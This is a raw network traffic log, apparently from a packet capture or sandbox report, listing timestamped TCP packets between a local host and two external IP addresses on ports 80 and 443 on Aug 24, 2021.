Aug 24, 2021 08:46:56.879421949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879426003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879462004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879502058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879540920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879554987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879587889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879595995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879651070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879703999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879759073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879762888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879812956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.879820108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879875898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879934072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.879966974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880060911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880109072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880124092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880184889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880247116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880286932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880302906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880328894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880342007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880371094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880410910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880455017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880470991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880506039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880520105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880584955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880629063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880669117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880676031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880708933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880716085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880748987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880805969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880855083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880866051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880908966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.880920887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.880964994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.881002903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.881052971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903265953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903290033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903306007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903321028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903338909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903356075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903371096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903383017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903388977 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903394938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903412104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903428078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903430939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903441906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903444052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903460026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903472900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903475046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903493881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903512001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903527021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903529882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903542995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903567076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903584003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903597116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903599977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903620005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903625011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903639078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903650999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903666019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903677940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903680086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903691053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903706074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903706074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903718948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903732061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903743982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903755903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903774977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903791904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903808117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903820038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903820992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903827906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903831959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903834105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903836012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903851032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903867006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903878927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903894901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903914928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903924942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903927088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903944016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903960943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903975964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.903987885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.903992891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904011011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904021978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904031038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904045105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904050112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904069901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904082060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904094934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904107094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904119015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904131889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904144049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904155970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904166937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904179096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904191017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904202938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904215097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904227018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904239893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904251099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904263020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904275894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904288054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904299021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904310942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904323101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904335022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904346943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904357910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904370070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904381990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904393911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.904480934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904489994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904494047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904503107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904505968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904509068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904510975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904514074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904517889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904520988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904524088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904525995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.904529095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.906548023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.918874025 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.918900013 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.918912888 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.918930054 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.918941975 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.919147968 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.919157982 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.919668913 CEST	443	49717	74.114.154.22	192.168.2.7
Aug 24, 2021 08:46:56.920243979 CEST	49717	443	192.168.2.7	74.114.154.22
Aug 24, 2021 08:46:56.926587105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926614046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926626921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926640034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926656961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926673889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926690102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926708937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926731110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926747084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926763058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926778078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926793098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926809072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926822901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926841974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926857948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926872969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926888943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926903963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926918983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926934958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926950932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926969051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.926985025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927002907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927021027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927036047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927051067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927066088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927082062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927100897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927150965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927170038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927186012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927197933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927213907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927229881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927246094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927261114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927277088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927292109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927310944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927328110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927342892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927359104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927372932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927388906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927403927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927418947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927437067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927453995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927469969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927484989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927500963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927515984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927531004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927546024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927566051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927582979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927598000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927613974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927628994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927644014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927659988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927675009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927695036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927711010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.927726030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928539991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928559065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928572893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928591967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928611040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.928626060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.931262016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.931392908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953417063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953455925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953480959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953505993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953530073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953553915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953552961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953579903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953598976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953604937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953607082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953629971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953651905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953655005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953680038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953704119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953722954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953730106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953753948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953762054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953782082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953795910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953808069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953830957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953855991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953877926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953881025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953905106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953921080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953929901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953954935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.953977108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.953982115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954006910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954030991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954034090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954054117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954056978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954078913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954101086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954124928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954129934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954149008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954152107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954175949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954190016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954194069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954210043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954226017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954230070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954252958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954269886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954276085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954286098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954303026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954319000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954324961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954335928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954350948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954359055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954370975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954387903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954389095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954404116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954415083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954421043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954437017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954452038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954452991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954468966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954485893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954500914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954504967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954523087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954528093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954539061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954552889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954555035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954571962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954586983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954591990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954603910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954619884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954638004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954638958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954657078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954660892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954672098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954687119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.954689026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.954705954 CEST	80	49715	212.224.105.79	192.168.2.7
